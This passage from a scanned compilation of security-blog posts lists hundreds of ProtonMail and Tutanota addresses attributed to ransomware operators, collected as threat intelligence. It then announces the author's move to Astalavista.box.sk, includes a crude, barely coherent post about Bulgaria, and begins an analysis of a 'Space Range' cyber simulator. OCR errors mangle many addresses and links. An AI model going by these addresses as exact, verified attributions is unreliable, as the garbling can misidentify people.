jOra@protonmail.com 
setimichas1971@protonmail.com 
bitchasshole@protonmail.com 
Stephenjoffe@protonmail.com 
zikr@protonmail.com 
zikra@protonmail.com 
spare322@protonmail.ch 
only4you@protonmail.com 
resurrection777@protonmail.com 
pabluk700@protonmail.ch 
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hackcwand@protonmail.com 
hackwand@protonmail.com 
supportfiless24@protonmail.ch 
MerlinVelso@protonmail.com 
cyborgyarraq@protonmail.ch 
HiddenMan0135@protonmail.com 
22212341 @protonmail.com 
AdamBrown89@protonmail.com 
William _Kidd _2019@protonmail.com 
helpteam38@protonmail.com 
133tsuppOrt1337@protonmail.com 
fun63s@protonmail.com 
AliMussafenLibat@protonmail.com 
helpnetin@protonmail.com 
Killback@protonmail.com 
mattpear@protonmail.com 
Yourencrypter@protonmail.ch 
recoverymydata@protonmail.com 
artemy75@protonmail.com 
getthefiles2@protonmail.ch 
newhelper24@protonmail.ch 
alexwind46@protonmail.com 
usernamus@protonmail.com 
basilisque@protonmail.com 
Blitzkriegoc@protonmail.com 

Bit _decrypt@protonmail.com 
bugbugo@protonmail.com 
dawndec001@protonmail.com 
painplain98@protonmail.com 
cammoral19@protonmail.com 
ccryptor@protonmail.com 
unlckr@protonmail.com 
un92@protonmail.com 

china _jm@protonmail.ch 

cobain ransom@protonmail.com 
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fixfilex@protonmail.ch 
CoronaDecryptOr@protonmail.com 
FushenKingdee@protonmail.com 
cr1-silvergold1@protonmail.com 
admin-amnesia@protonmail.com 
btc.com@protonmail.ch 
no.xm@protonmail.ch 
recovery.company@protonmail.com 
iracomp4@protonmail.ch 
yourencypter@protonmail.com 
cybervigilante4453@protonmail.com 
bbqb@protonmail.com 
Santa-helper@protonmail.com 
shellexec@protonmail.com 
jeeperscrypt@protonmail.com 
qwqd@protonmail.com 
incognitoman@protonmail.com 
djangOunchain3d@protonmail.com 
dmo904zB@protonmail.com 
Agent.DMR@protonmail.com 
burcr@protonmail.com 
DataRescue@protonmail.com 
cynthia-it@protonmail.com 
Empty003@protonmail.com 
cryptopatronum@protonmail.com 
thecurelegion@protonmail.com 
zazakuku@protonmail.com 
RobSmithMba@protonmail.com 
montserrat501@protonmail.com 
errorO3@protonmail.com 

ex _parvis@protonmail.com 
fastwindGlobe@protonmail.com 
FlamingoRans@protonmail.com 
mykeyhelp@protonmail.com 


french101@protonmail.ch 
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HanzOttoschmidt@protonmail.com 
xxcte2664@protonmail.com 
getcoin2@protonmail.com 
FreeWizard9@protonmail.com 
chines34@protonmail.ch 
microcost@protonmail.ch 
gygabot@protonmail.com 
DecryptFs@protonmail.com 
datahelper@protonmail.com 
RemotePChelper@protonmail.com 
lafoievologjaninl123@protonmail.com 
best666decoder@protonmail.com 
Help557@protonmail.com 
trOning@protonmail.com 
decoderforyou@protonmail.com 
hlpp@protonmail.ch 
jackgreenl13@protonmail.com 
cryptomavens@protonmail.com 
letsgetyourfileback@protonmail.com 
soft.russian@protonmail.com 
Cost1BTC@protonmail.com 
allback@protonmail.ch 
JamesBaker78@protonmail.com 
backfile99@protonmail.com 
loggitorel1984@protonmail.com 
KOKO8@protonmail.com 
mailnitrom@protonmail.ch 
r3vo@protonmail.com 
lock2017@protonmail.com 
slanson _street8@protonmail.com 
back7@protonmail.ch 
Mayth24@protonmail.com 
momsbestfriend@protonmail.com 
jj@protonmail.ch 
motox2016@protonmail.com 
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payforsecurity 1@protonmail.com 
_24 7@protonmail.com 
restorefiles@protonmail.ch 
sporter4499@protonmail.com 
obliviondecrypt@protonmail.com 
tk.btcw@protonmail.ch 
softs98@protonmail.com 
usertyty@protonmail.ch 
BlackMajor@protonmail.com 
parisher@protonmail.com 
Pec.clean@protonmail.com 
recoverydata54@protonmail.com 
nadwkjk@protonmail.com 

hello _psecu@protonmail.com 
ransunlock@protonmail.com 
razor2020@protonmail.ch 
Paradiseconnect@protonmail.com 
malieholtan@protonmail.com 
rebushelp@protonmail.com 
ambrosiaa@protonmail.com 
atomickule@protonmail.com 
getdataback22@protonmail.com 
unlockdata22@protonmail.com 
billwong73@protonmail.com 
evopro@protonmail.com 
servicedigilogos@protonmail.com 
cosanostral9@protonmail.com 
decryptOr-help@protonmail.com 
dalailama2015@protonmail.ch 
Wecanhelp@protonmail.com 
helptate@protonmail.com 
cybersccp@protonmail.com 
dd.coala@protonmail.com 
dec.service@protonmail.com 


glushkov@protonmail.ch 


8729 


DiskDoctor@protonmail.com 
rsupp@protonmail.ch 
executioner.ransom@protonmail.com 
fastbob@protonmail.com 
bakfiles@protonmail.com 
PabFox@protonmail.com 
_garryweber@protonmail.ch 
anony46NcRyptr708o0nion@protonmail.ch 
godra@protonmail.ch 
darkusmbackup@protonmail.com 
helpmedecrypt@protonmail.com 
cryz1@protonmail.com 
alanwalkergod@protonmail.com 
greystars@protonmail.com 
Inchinaiturtle@protonmail.com 
WuTang444@protonmail.com 
fileisafe@protonmail.com 
JeanRenoAParis@protonmail.com 
provectus@protonmail.com 
kampretos@protonmail.com 
OrdinalScale@protonmail.com 
mstr.hack@protonmail.com 
slothcbx@protonmail.com 
hernansec@protonmail.ch 
Terminator _123@protonmail.com 
DharmaBarrack@protonmail.com 
MayarChenot@protonmail.com 
magicman22@protonmail.ch 
RestoreFile@protonmail.com 
Files4463@protonmail.ch 
KOK8@protonmail.com 
maxidecrypt@protonmail.com 
suppdecrypt@protonmail.com 
moncoin@protonmail.com 
imaje.jpg.nefartanulo@protonmail.com 
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nefartanulo@protonmail.com 
newrar@protonmail.com 
6699nm@protonmail.com 

die _yourself@protonmail.com 

Ad _finem001@protonmail.com 
TEST@protonmail.com 
spaghetih@protonmail.com 
pizzacrypts@protonmail.com 
quickhelp24@protonmail.com 
Recuperaddados@protonmail.com 
elizabeth7 @protonmail.com 
gaetwelsenbal983@protonmail.com 
otostehos1970@protonmail.com 
kirsninmaino1977@protonmail.com 
hemulninal974@protonmail.com 
ibfosontsing@protonmail.com 
papinsdasun1982@protonmail.com 
cestidemet1983@protonmail.com 
MelisaPeterman@protonmail.com 
CR7213uDS32s@protonmail.com 
jodishunterteam@protonmail.com 
imBoristheBlade@protonmail.com 
unlockmeplease@protonmail.com 
Filegorillal388@protonmail.com 
vendetta553@protonmail.com 
mrbin775@protonmail.com 
mrdeep@protonmail.com 
translatos@protonmail.com 
fbifine@protonmail.com 
serpom@protonmail.com 
vinilblind@protonmail.com 
sills@protonmail.ch 
encryptfile@protonmail.com 

dec _restore@protonmail.com 


panda831@protonmail.com 
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sysfrog@protonmail.com 
helptounlock@protonmail.com 
bivisfiles@protonmail.com 
cryptofiles20202020@protonmail.com 
langdiru1887@protonmail.com 
mr.crypteur@protonmail.com 
xlsx@protonmail.com 
yakomoko@protonmail.com 
Malakot@protonmail.com 
qqxxxxxqq@protonmail.com 
WWXXXxXxwWW@protonmail.com 
Recoverybat@protonmail.com 
hacker _decryption@protonmail.ch 
doctorSune@protonmail.com 
supportdoctor@protonmail.com 
3335799@protonmail.com 
0x69x@protonmail.com 
spaxl425@protonmail.com 
data1992@protonmail.com 
pianist6@protonmail.com 
asgardmaster5@protonmail.com 
yougame@protonmail.ch 
unlocking2020@protonmail.ch 
flotera@protonmail.ch 
databack2@protonmail.com 
phrasitliter1981@protonmail.com 
sprosinas2@protonmail.com 
YourDataHere@protonmail.com 
Cobra _Locker2.0@protonmail.com 
LordCracker@protonmail.com 
E-Mail-lock2017@protonmail.com 
pizzacrypts@protonmail.co 
Sepsis@protonmail.com 
E-Mail-Sepsis@protonmail.com 
sharkO03@protonmail.com 
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jschweiz@protonmail.ch 
MastersRecovery@protonmail.com 
nowayout@protonmail.com 
systempc18x@protonmail.com 
Lockify@protonmail.com 
gibberishEdmundBass@protonmail.com 
VenisRansom@protonmail.com 
odin19@protonmail.com 
corporacaoxrat@protonmail.com 
XZZxX1@protonmail.com 
zeoticus@protonmail.com 
Payfordecrypt@protonmail.com 
SilentDeathDecryptor@protonmail.com 
RecoveryDatal@protonmail.com 
SantaGman@protonmail.com 
vashmail@protonmail.com 
E-Mail-mr.crypteur@protonmail.com 
ReftuOne@protonmail.com 
ZinoCrypt@protonmail.com 

data recovery soft@protonmail.com 
E-Mail-painplain98@protonmail.com 
entsperren2020@protonmail.ch 
genetid@protonmail.ch 
databaseack2@protonmail.com 
decoder83540@protonmail.com 
Exte2@protonmail.com 
0301192293@protonmail.com 
zetfile@protonmail.ch 
coder007@protonmail.com 
desbloqueo2020@protonmail.ch 
FridaFarko@protonmail.com 
worknow@protonmail.com 
Sidmouleux996@protonmail.com 
tellyouthepass@protonmail.com 


Bossi tosi@protonmail.com 
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guifullchartill9 70@protonmail.com 
aireyeric@protonmail.com 
ellershaw.kiley@protonmail.com 
raingemaximo@protonmail.com 
gareth.mckie3I|@protonmail.com 
decryptdocs@protonmail.com 
MasterFile001@protonmail.com 
txdot911@protonmail.com 
decrypt data2@protonmail.com 
zoro4747@protonmail.com 

itunes decrypt@protonmail.com 
nordfox@protonmail.com 
middleman2020@protonmail.com 
Vitaly. Yermakov@protonmail.com 
unk921@protonmail.com 
4shadow@protonmail.com 
uzuvnkyh@protonmail.com 
x1881@protonmail.com 
checlkyourfiles@protonmail.com 


Sample portfolio of currently active Totanota accounts used by ransomware gangs and DIY 
ransomware users: 


batmanbitkal@tutanota.com 
kisamurusa@tutanota.com 
ventablack@tutanota.de 
luxenburg@tutanota.com 
help-123@tutanota.com 
diegobtc@tutanota.com 
robot2018@tutanota.com 
adobe-123@tutanota.com 
qqwp@tutanota.com 
amber777king@tutanota.com 
Darksides@tutanota.com 
filekey77@tutanota.com 
crypt7@tutanota.com 
luxsoft@tutanota.com 
lablabpub@tutanota.com 
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MasterLuBu@tutanota.cock.li 
helpsok@tutanota.com 
keyfiles@tutanota.com 
filesback@tutanota.com 
devil98@tutanota.com 
Theransom@tutanota.com 
job2019@tutanota.com 
phobosrecovery@tutanota.com 
com-gloria@tutanota.com 
member987 @tutanota.com 
bbbitcrypt@tutanota.com 
DECRPT@tutanota.com 
SoporteVoid@tutanota.com 
unlOckerpkx@tutanota.com 
decoderma@tutanota.com 
VoidFiles@tutanota.com 
coronavirus19@tutanota.com 
encrypt4u@tutanota.com 
rsaencrypt@tutanota.com 
Zizz@tutanota.de 
klowershitI835@tutanota.com 
decisivekey@tutanota.com 
Sherminator.help@tutanota.com 
starbax@tutanota.com 
blacknord@tutanota.com 
20xser@tutanota.com 
der.xser@tutanota.com 
datareesstore@tutanota.com 
20sherminator.help@tutanota.com 
der.Sherminator.help@tutanota.com 
ways.xser@tutanota.com 
ways.Sherminator.help@tutanota.com 
patagonia92@tutanota.com 
nprOtector@tutanota.com 


nrestoreassistant2@tutanota.com 
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u201c24H@tutanota.com 
nStephenjoffe@tutanota.com 
nAskHelp@tutanota.com 
nFoxHelp@tutanota.com 
nMelisaPeterman@tutanota.com 
ntommy.sanders@tutanota.com 
nfilekerk@tutanota.com 
nibfosontsing@tutanota.com 
nanatova2@tutanota.com 
nanatoday@tutanota.com 
nmanagersmaers@tutanota.com 
n2.Hariliuios@tutanota.com 
nsherminator.help@tutanota.com 
nmrromber@tutanota.com 
ndecodedecode@tutanota.com 
nzeoticus@tutanota.com 
tDataRescue@tutanota.com 
nbest666decoder@tutanota.com 
ngiveyoukey@tutanota.com 
nJamesBaker78@tutanota.com 
nMayth24@tutanota.com 
nAdamBrown89@tutanota.com 
adresspower@tutanota.com 
notgoodnews@tutanota.com 
AskHelp@tutanota.com 
nAskHelp@tutanota.com 
nAlanRed@tutanota.com 
BobGreen85@tutanota.com 
nBobGreen85@tutanota.com 
backbigdata@tutanota.com 
ntyrkinovusr@tutanota.com 
BatHelp@tutanota.com 
nBatHelp@tutanota.com 
nCtorsenoria@tutanota.com 
nnekross@tutanota.com 
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nklowershit1835@tutanota.com 
SmartDen@tutanota.com 
nmiddleman2020@tutanota.com 
MarkTrue88@tutanota.com 
ndprworkjessiaeyel955@tutanota.com 
Bernardocarlos@tutanota.com 
nBernardocarlos@tutanota.com 
nullcipher@tutanota.com 
SafeGman@tutanota.com 
qhrghghk@tutanota.com 
nghrghghk@tutanota.com 
SantaGman22@tutanota.com 
ntimothymandock@tutanota.com 
Wenuptwenl@tutanota.com 
decrpt@tutanota.com 
iamwellwisher@tutanota.com 
galgalgalhalk@tutanota.com 
kavariusing@tutanota.com 
252BStuardRitchi@tutanota.com 
252Bpixell@tutanota.com.ph 
pashmak@tutanota.com 
StuardRitchi@tutanota.com 
2BStuardRitchi@tutanota.com 
2Bpixell@tutanota.com.ph 
pixell@tutanota.com.ph 
Zeman@tutanota.de 
Helps@tutanota.com 
raynorzlol@tutanota.com 
savemyself1@tutanota.com 
akzhq808@tutanota.com 
Kromber@tutanota.com 
Kishemez@tutanota.com 
somalie555@tutanota.com 
fedoremelianenko@tutanota.com 
Huntingdonu@tutanota.com 
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WayneEvenson@tutanota.com 
blackmax@tutanota.com 
filemgr@tutanota.com 
anfreesextuo1982@tutanota.com 
nanfreesextuo1982@tutanota.com 
AleksanderEmelianenko@tutanota.com 
mr.crypteur@tutanota.com 
koreadec@tutanota.com 
shinel@tutanota.com 
2.Galgalgalhalk@tutanota.com 
petek@tutanota.com 
BCPFILE17@tutanota.com 
removeme2020@tutanota.com 
arnoldmichel2@tutanota.com 
system _stop2020@tutanota.co 
starbax@tutanota.de 
mr.crypt@tutanota.com 
ths1337@tutanota.com 
pendor111@tutanota.com 
Filesrestore@tutanota.com 
robinhoodxxx007@tutanota.com 
DILIGATMAIL@tutanota.com 
DILIGATMAIL7 @tutanota.com 
PIFAGORMAIL@tutanota.com 
johnsonwhate@tutanota.com 
dongeswas@tutanota.com 
Hariliuios@tutanota.com 
Galgalgalgalk@tutanota.com 
Cryptor6@tutanota.com 
u00aOWSS911@tutanota.com 
PedantBack@tutanota.com 
evangelina.mathews@tutanota.com 
darkpart@tutanota.com 
darkware@tutanota.com 
ACCUDATA1@tutanota.com 
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ACCUDATA2@tutanota.com 
afroditeam@tutanota.com 
atilla666@tutanota.com 
redbul@tutanota.com 
gqar48@tutanota.com 
zer@tutanota.com 
picture.jpg.qar48@tutanota.com 
ElmersVictoria@tutanota.com 
cryptoshocker@tutanota.com 
backtonormal@tutanota.com 
glushkov@tutanota.de 
master777@tutanota.com 
donutmmm@tutanota.com 
EncodeMan@tutanota.com 
getkeys@tutanota.com 
funfacts11@tutanota.com 
proof3200@tutanota.com 
program3200@tutanota.com 
koreajoin69@tutanota.com 
tru8@tutanota.com 
rdphelp@tutanota.com 
svchostport@tutanota.com 
hildaseriesnetflix125@tutanota.com 
LINDA.HARTLEY @tutanota.com 
sabantui@tutanota.com 
atilla666@tutanota.co 
2.kavariusing@tutanota.com 
bmps@tutanota.com 
rootcopper@tutanota.com 
bl4ckdr4gon@tutanota.com 
asist5000@tutanota.com 
JonStokton@tutanota.com 
filessnoop@tutanota.com 
localgroup@tutanota.com 
avariusing@tutanota.com 
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StaRcRypt@tutanota.com 

Ad _finem@tutanota.com 

pendor 1@tutanota.com 
ecodeme666@tutanota.com 
anonimus852@tutanota.com 
0x720x730x610x30@tutanota.com 
0x720x730x610x31@tutanota.com 
eliasmarco@tutanota.com 
getsend@tutanota.com 
symmetriesO@tutanota.com 
cryptget@tutanota.com 
help73@tutanota.com 
Helpcryptl@tutanota.com 

ex _parvis@tutanota.com 
szems@tutanota.com 
donutman@tutanota.com 
lafoievologjaninl23@tutanota.com 
sevenbbvv@tutanota.com 
henry.prowse@tutanota.com 
imran.adil@tutanota.com 
merymerime@tutanota.com 
clified@tutanota.com 
Alissa.carney@tutanota.com 
pink-paw.gif.arnoldmichel2@tutanota.com 
atila666@tutanota.com 
sambolero@tutanota.com 
prusa@tutanota.de 

dark code@tutanota.com 
xcv786@tutanota.com 
fordGolden93@tutanota.com 
E-Mail-afroditateam@tutanota.com 
king.ouroboros@tutanota.de 
Jinnyg@tutanota.com 
E-Mail-Filemgr@tutanota.com 
Merd@tutanota.com 
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aq811@tutanota.com 
jon2019@tutanota.com 
bobelectron@tutanota.com 
vimbilbom@tutanota.com 
johsonshate@tutanota.com 
retoreassistant2@tutanota.com 
BhatMaker@tutanota.com 
VoidDeceryptor@tutanota.com 
kalimenok@tutanota.com 
pristonklav@tutanota.com 
Yourencrypt@tutanota.com 
systems32x@tutanota.com 
stephenjoffe@tutanota.com 
gracie.reed@tutanota.com 
shane.gilles@tutanota.com 
wahabigreen@tutanota.com 
loder903@tutanota.com 
regina.shelton@tutanota.com 
buratino2@tutanota.com 
ticketbit@tutanota.com 
flower.harris@tutanota.com 
kay.robertson@tutanota.com 
kfsmail@tutanota.com 
onepconebtc@tutanota.com 
xxxinstant@tutanota.com 
2.Galgalgalgalk@tutanota.com 
covid-123@tutanota.com 
yongloun@tutanota.com 
srat@tutanota.com 
helpforyoupc@tutanota.com 
1.jpg.arnoldmichel2@tutanota.com 
dtddesht@tutanota.com 
reddragon3335799@tutanota.com 
HelpforFiles@tutanota.com 


mrdjohni@tutanota.com 
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akzhq725@tutanota.com 
encryptboys@tutanota.com 
whyruencrypt@tutanota.com 
demancryptolock@tutanota.com 
thepersephone@tutanota.com 
vivanger123@tutanota.com 
mccreight.ellery@tutanota.com 
chiaraKolkmann@tutanota.com 
r4nsOm@tutanota.com 
moon4x4@tutanota.com 
Hubble77@tutanota.com 
filedec@tutanota.com 
eleezcry@tutanota.com 

-black _wayne@tutanota.com 
coincidenceleague@tutanota.com 
garrymagic@tutanota.com 
darkwaiderr@tutanota.com 
remotePChelper@tutanota.com 
skgrhk2018me@tutanota.com 
johnsmith987654@tutanota.com 
cricket@tutanota.com 
FilesHelp@tutanota.com 
darkencryptor@tutanota.com 
Decfile431@tutanota.com 
smartrecav@tutanota.com 
zxqwopnm@tutanota.com 
252Bdfvdv@tutanota.com 
252Bjakie.nunes@tutanota.com 
252Bhallome@tutanota.com 
252BBlacknord@tutanota.com 
pixell@tutanota.com 
yuzhou13@tutanota.com 
tchukopchu@tutanota.com 
klowershit1835@tutanota.com 
file987@tutanota.com 
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bitrequest@tutanota.com 
Blacknord@tutanota.com 
mirey@tutanota.com 
Patagonia92@tutanota.com 
skynet45@tutanota.com 
Starbax@tutanota.com 
xzet@tutanota.com 
clifieb@tutanota.com 
rsal024@tutanota.com 
sherminator.help@tutanota.com 
badbusiness@tutanota.de 
satco@tutanota.com 
Job2019@tutanota.com 
rohitramses@tutanota.com 
tcprx@tutanota.com 
volcano666@tutanota.de 
123@tutanota.com 
mr.dec@tutanota.com 
2BBlacknord@tutanota.com 
2Bdfvdv@tutanota.com 
2Bhallome@tutanota.com 
2Bjakie.nunes@tutanota.com 
dfvdv@tutanota.com 
jakie.nunes@tutanota.com 
hallome@tutanota.com 
ClassesBlacknord@tutanota.com 
dongeswas@tutanota.co 
systems@tutanota.com 
szem@tutanota.com 
help@tutanota.com 
Szems@tutanota.com 
Patagonoa92@tutanota.com 
Classesjakie.nunes@tutanota.com 
Decisivekey@tutanota.com 


key. Decisivekey@tutanota.com 
8743 


Datareesstore@tutanota.com 
foxnitro@tutanota.com 
MasterLuBu@tutanota.com 
nmode@tutanota.com 
Classesdfvdv@tutanota.com 
akzhq808@tutanota.com.ma 
yyuzhou13@tutanota.com 
bcpfilel 7@tutanota.com 
xilttbg@tutanota.com 
retrnyoufiles@tutanota.com 
24H@tutanota.com 
buddy888@tutanota.com 
9eab6e85bd12b@tutanota.com 
berserk666@tutanota.com 
Ctorsenoria@tutanota.com 
timothymandock@tutanota.com 
prosoft@tutanota.com 
mr.hacker@tutanota.com 
kokux@tutanota.com 
sebekgrime@tutanota.com 
seeyoubro@tutanota.com 
dprworkjessiaeye1955@tutanota.com 
2.Hariliuios@tutanota.com 
luciferenc@tutanota.com 
beryl.mclennan@tutanota.de 
pvphlIp@tutanota.com 
ykup@tutanota.com 

ad _finem@tutanota.com 
AskHelp@tutanota.com 
coding 434@tutanota.com 
combo@tutanota.de 
biggsurprise@tutanota.com 
ochennado@tutanota.com 
decodeme666@tutanota.com 
decrfile@tutanota.com 
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bitcoins12@tutanota.com 
prOtector@tutanota.com 
grdoks@tutanota.com 
Stephenjoffe@tutanota.com 
adren.kutospov.97@tutanota.com 
wang.chang888@tutanota.com 
wangteam888@tutanota.com 
2048rsa@tutanota.com 
AdamBrown89@tutanota.com 
Panama777@tutanota.com 
afroditateam@tutanota.com 
AlanRed@tutanota.com 
xser@tutanota.com 
artemy75@tutanota.com 
juniorwanme@tutanota.com 
null _ptr@tutanota.de 
heineken@tutanota.io 
xzer@tutanota.com 
DataRescue@tutanota.com 
tommy.sanders@tutanota.com 
neverdies@tutanota.com 
nekross@tutanota.com 

royal flush@tutanota.com 
joker _money@tutanota.com 
lafoievologjanini23@tutanota.com 
best666decoder@tutanota.com 
allback@tutanota.com 
JamesBaker78@tutanota.com 
recoryfile@tutanota.com 
giveyoukey@tutanota.com 
Blackmax@tutanota.com 
mailnitrom@tutanota.com 
Mayth24@tutanota.com 
elzmflqxj@tutanota.de 


Heeeh98@tutanota.com 
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paragonia92@tutanota.com 
digiworldhack@tutanota.com 
dryidik@tutanota.com 
adolfhackler@tutanota.com 
anatova2@tutanota.com 
anatoday@tutanota.com 
atomickule@tutanota.com 
decodedecode@tutanota.com 
managersmaers@tutanota.com 
tyrkinovusr@tutanota.com 
skgrhk2018@tutanota.com 
bit-tray@tutanota.com 

kurosaki ichigo@tutanota.com 
Suzumiya _Haruhi@tutanota.com 
lelouchlamperouge@tutanota.com 
teresa@tutanota.de 
merd@tutanota.com 
FoxHelp@tutanota.com 
WSS911@tutanota.com 
marjut65@tutanota.com 
rememberggg@tutanota.com 
restoreassistant2@tutanota.com 
RestorFile@tutanota.com 
oken@tutanota.com 
btc2018@tutanota.de 
m4rkOv@tutanota.de 
systems64x@tutanota.com 
powerbase@tutanota.com 
filesrestore@tutanota.com 
ibfosontsing@tutanota.com 
MelisaPeterman@tutanota.com 
soft2018@tutanota.com 
mrromber@tutanota.com 
affrontumerSummers@tutanota.com 
xlsx@tutanota.com 
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e-mail-decisivekey@tutanota.com 
e-mail-decrfile@tutanota.com 
gorkmork@tutanota.de 
decspeed@tutanota.com 
filekerk@tutanota.com 
Wege.xser@tutanota.com 
coinsman@tutanota.com 
E-Mail-dryidik@tutanota.com 
zeoticus@tutanota.com 
SantaGman@tutanota.com 
hackerz6924@tutanota.com 
JeryDark@tutanota.com 
E-Mail-satco@tutanota.com 
E-Mail-clifieb@tutanota.com 
nordfox@tutanota.com 
middleman2020@tutanota.com 
Filemgr@tutanota.com 
cryptor6@tutanota.com 


I’m ina process of contacting Protonmail and Tutanota’s abuse teams in terms of shutting down 
the accounts. 


Stay tuned! 


1. https: //1. bp.blogspot . com/~5JvOAm9hIeM/X6ezWCxiQWI/AAAAAAAALMM/D jBDnPS8QhbQ9rUZVP4nSnm-fRg 1M827 j gCLcBGASYHQ 
2. https://ddanchev. blogspot .com/2020/09/profiling-currently-active-high-profile.htm 

3. https: //unit-123. org/wp-content/uploads/2020/09/Misc_02. txt 

4. https: //unit-123. org/wp-content/uploads/2020/09/Misc_03. txt 


5. https: //ddanchev. blogspot .com/2020/09/profiling-currently-active-high-profile.htm 


6. https://unit-123.org/wp-content/uploads/2020/09/Misc_01.txt 


16.10 December 


16.10.1 Joining Team Astalavista.box.sk - Official Project Re-Launch - Join us Today! 
(2020-12-01 23:32) 


Dear blog readers, 
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| wanted to take the time and effort and let you know that I’ve officially joined forces with 
Astalavista.box.sk which is the original Astalavista.box.sk search engine for hackers circa 
1997 and which is one of the World’s most popular Web sites for hackers and security experts 
where I’m currently acting as a Project Operator and where we've recently launched a 
high-profile and flagship search engine for hackers and security experts with the idea to make 
it publicly accessible and online for free potentially reaching out to thousands of loyal users 
across the globe on a daily basis which can be publicly accessed from the front page of the 
portal or from [2]here including a flagship Dark Web search engine which can be accessed 
from the home page. 


Currently running projects on the original Astalavista.box.sk include: 
e [3]Security and Hacking Forum 
¢ [4]Security Newsletter 
¢ [5]Crowd-funded Virtual Reality application for hackers and security experts 
¢ [6]Hacking and Security Blog 


You can also browse the old version of the re-surrected portal [7]here including the actual 
[8]Call for Papers. It’s also a privilege and an honor to let you know that we’re currently hiring 
and looking for possible full-time Team Members in a variety of categories where we intend to 
share some of the advertising revenue with current and upcoming Team Members. 


You can also go through some of the following blog posts to catch up in terms of what we’ve 
been up to in terms of research: 


[9]A Brief Introduction to the New Box.sk Project - or Who’s Dancho Danchev? 


¢ [10]Enter a Bold New World of Hacking and Security - Embrace the Cybertronics VR Plat- 
form for Hackers and Security Experts Today! We’re Hiring! 


[11]Introducing Box.sk’s Flagship Hacking and Security Search Engine! We’re back! 


¢ [12]Announcing a New Hacking and Security Collaborative E-book Writing Initiative - Join 
Us Today! 


¢ [13]Announcing the Official Launch of Box.sk’s Hacking and Security IRC Network! Join Us 
Today! 


¢ [14]New Box.sk Online Security and Privacy Talk-Show featuring Dancho Danchev - Listen 
in Today! 


¢ [15]JAnnouncing Dancho Danchev’s Exclusive Personal Hacking and Security Research 
Memoir - Free Copy Available! 


¢ [16]Announcing Box.sk’s World Hacker Global Domination Group (WHGDG) Call for Secu- 
rity and Privacy Papers and Call for Innovation 


¢ [17]Upcoming Box.sk High-Profile YouTube Livestream - The Scene and The Security In- 
dustry The Way We Know It - Bookmark the Link Today! 
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¢ [18]Introducing Box.sk’s Flagship “Data Paradise” Old-School KGB-Style Dial-In Intranet 


Stay tuned! 


1, fittps://1.bp. blogspot .con/~xH59#RBURMO/#vT4u0_21/AAAAAAAALME/0s0TOEnFnlicoOdWxBITTMhTo4Cix135ACLcBCASYHG 
| fete: //antalaviata pacypoar net] 

_ https: //astalavieta, box. sk/phpBB3 

| https: //www.freclists,org/list /security 

| https: //bor.sk/tisc. 07 /index. html 

. https://astalavista.box.sk/wordpress/ 

. https: //box.sk/Misc_08/index. htm] 


ttps://www.box.sk/wordpress/2020/01/07/announcing-box- sks-world-hacker-global-domination-group-whgdg-ca 


2 
3 
4 
5 
6 
7 
8. 


11-for-security-and-privacy-papers-and-call-for-innovati 


https ://www.box.sk/wordpress/2020/01/07/a-brief-introduction-to-the-new-box- sk-project-or-whos-dancho-da 


0 


10. https://www.box.sk/wordpress/2020/03/06/enter-a-bold-new-world-of-hacking-and-security-embrace-the-cybe 


ronics-vr-platform-for-hackers-and-security-experts-tod 


11. https://www.box.sk/wordpress/2020/04/23/introducing-box-sks-flagship—hacking-and-security-search-engine- 


ere- 
12. https: //www.box.sk/wordpress/2020/03/11/announcing-a-new-hacking-and-security-collaborative-e-book-writi 


initiative-join-us-today/ 


g- 
13. https: //www.box.sk/wordpress/2020/04/27/announcing-the-official-launch-of-box-sks-hacking-and-security-i 


rc-network- join-us-today/ 


14. https: //www.box.sk/wordpress/2020/01/10/new- box-sk-online-security-and-privacy-talk-show-featuring-danc 


o-danchev-listen-in-today/ 


15. https://www.box.sk/wordpress/2020/08/14/announcing-dancho-danchevs-exclusive-personal-hacking-and-securi 


y-research-memoir-free-copy-available/ 


ttps://www.box.sk/wordpress/2020/01/07/announcing-box- sks-world-hacker-global-domination-group-whgdg-ca 


11-for-security-and-privacy-papers-and-call-for-innovati 


. https: //www.box.sk/wordpress/2020/03/11/upcoming-box- sk-high-profile-youtube-livestream-the-scene-and-t 


e-security-industry-the-way-we-know-it-bookmark-the-link 


18. https://www.box.sk/wordpress/2020/08/14/introducing-box-sks-flagship-data-paradise-old-school-kgb-style- 


dial-in-intranet/ 


16.10.2 Greetings from Bulgaria - 2019 - An Intelligence Analyst’s Perspective 
(2020-12-01 23:34) 


[1] 
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[2]Anyone there? 


In a savagery peasant-aria which can be best described as the country where crime is 
supposedly prolific based on psychotropic substances and a "newspaper" courtesy - you wish 
you wish - of the basement of "someone" that thought that the CIA is running the country 
thanks to a "described" but supposedly "pre-scribed" leader of the country - increasing the 
longevity of peasant-aria land to continue vomiting in the very nothing? Not fair my friend. It 
shouldn’t be surprising that nothing is ever taking place at all. 


Keep reading. 


- Key Summary Points 


¢ Do you know what TOR is? 
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¢ Are you "based" on the Intelligence? 


Can you best describe Bulgarian Intelligence Services? Pretty simple. It’s you r father’s ugly 
Intelligence book with a vibrator on it - namely - an apparatus. 


¢ When did you first discover Facebook? 
Let’s spit and vomit and take a photo of it - isn’t this fancy? Or shall we spank your digital 
existence based on the clustered irrelevance of your degraded social vomit? Dare to press 


a button once again and We Shall Prevail to the bottom of the irrelevant obfuscation of your 
dare existence? Not fancy. 


¢ Do you know who Yavor Kolev is? 


And since when did it became fashionable to know who Misho Mishov is? Think twice and 
[3]feel free to skip these Congressional Hearings. 


* Do you have a career? 


Do you "go" to work? Do you have a "career"? Can you make the difference? You wish. 


¢ Are you heading to the airport? 


- Don’t be in a hurry - there’s a toilet. 


Relocation and full-time cybercrime research security blogging and threat intelligence 
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position proposals can be directed to dancho.danchev@hush.com 


Stay tuned! 


1. https://4.bp. blogspot .com/-EBwXFeQLaZ8/XNCFnJLESr1I/AAAAAAAAT_k/7cnVQkeoiXUHPZeffGYNYnakKUWtwwCYiACLcBGAs/s1 
600/Dancho_Danchev_Party_2012. JP 
2. https: //ddanchev.blogspot .com/2019/04/dancho-danchevs-2010-disappearance. htm 


3. https: //ustr.gov/sites/default/files/03182014/,20TRANSCRIPT%2020147%20Special%20301%,20Hearing/,20FINAL . pdf 


16.10.3 ManTech Introduces Newly Lauched Cyber Security "Space Range" - An Anal- 
ysis (2020-12-01 23:36) 


[1] 


Have you ever dreamed of launching an [2]offensive cyber warfare payload from [3]Space? 
Keep reading. 


[4] 
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| CYBER THREATS TO SPACE SYSTEMS SPACE RANGE COMPONENT MAPPING 


It appears that the newly launched MantTech’s "[5]Space Range" cyber security simulation is 
truly capable of offering a fully-realistic cyber security and information security simulation 
environment that’s successfully capable of launching an offensive cyber warfare payload from 
